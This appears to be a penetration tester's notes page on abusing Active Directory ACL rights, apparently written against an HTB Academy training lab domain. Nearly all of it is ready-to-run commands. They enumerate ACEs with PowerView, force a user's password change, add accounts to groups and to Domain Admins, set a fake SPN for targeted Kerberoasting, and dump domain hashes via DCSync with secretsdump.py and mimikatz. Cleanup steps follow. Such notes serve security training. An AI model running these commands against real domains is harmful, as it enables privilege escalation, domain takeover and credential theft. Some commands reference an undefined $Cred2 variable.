📃

Domain ACLs

Tags
GenericAllGenericWriteWritePropertySelf-MembershipForceChangePasswordWriteOwnerWriteDACLDS-Replication-Get-ChangesAllExtendedRightsAddselfAdd MembersLateral MovementPrivilege EscalationPersistence
Overview

Identify

Tool Based

Windows (powerview)

Find-InterestingDomainAcl
local
Import-Module .\PowerView.ps1
$sid = Convert-NameToSid wley
targtt user wley
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
💡

Note that if PowerView has already been imported, the cmdlet shown below will result in an error. Therefore, we may need to run it from a new PowerShell session.

Or just look at bloodhound

Manually

Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
list of domain users
foreach($line in [System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")) {get-acl  "AD:\$(Get-ADUser $line)" | Select-Object Path -ExpandProperty Access | Where-Object {$_.IdentityReference -match 'INLANEFREIGHT\\wley'}}
List ACEs

from here we would google the “ObjectType” entry to find the rights the GUID represents

Exploit

Force-Change-Password

$SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
Authenticate as user you have control of (skip if already logged in as user)
$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
Create secure string object (will be target users new password)
Import-Module .\Powerview.ps1
Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose
Perform attack

Add-DomainGroupMember

$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)
Authenticate as user you have control of (skip if already logged in as user)
Import-Module .\Powerview.ps1
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose
perform attack
Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName

GenericAll

Targeted kerberoast

Import-Module .\Powerview.ps1
Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
Set spn
.\Rubeus.exe kerberoast /user:adunn /nowrap
Kerberoast

Add user to domain admins

Net group "domain admins" <user> /add /domain
if you have a session on the user with genericall

DS-Replication-Get-Changes-All

From linux

secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5
remote

From windows

runas /netonly /user:INLANEFREIGHT\adunn powershell
local
.\mimikatz.exe
privilege::debug
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator

Cleanup considerations

Removing the Fake SPN from adunn's Account

Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose

Removing damundsen from the Help Desk Level 1 Group

Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose

Confirming damundsen was Removed from the Group

Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName |? {$_.MemberName -eq 'damundsen'} -Verbose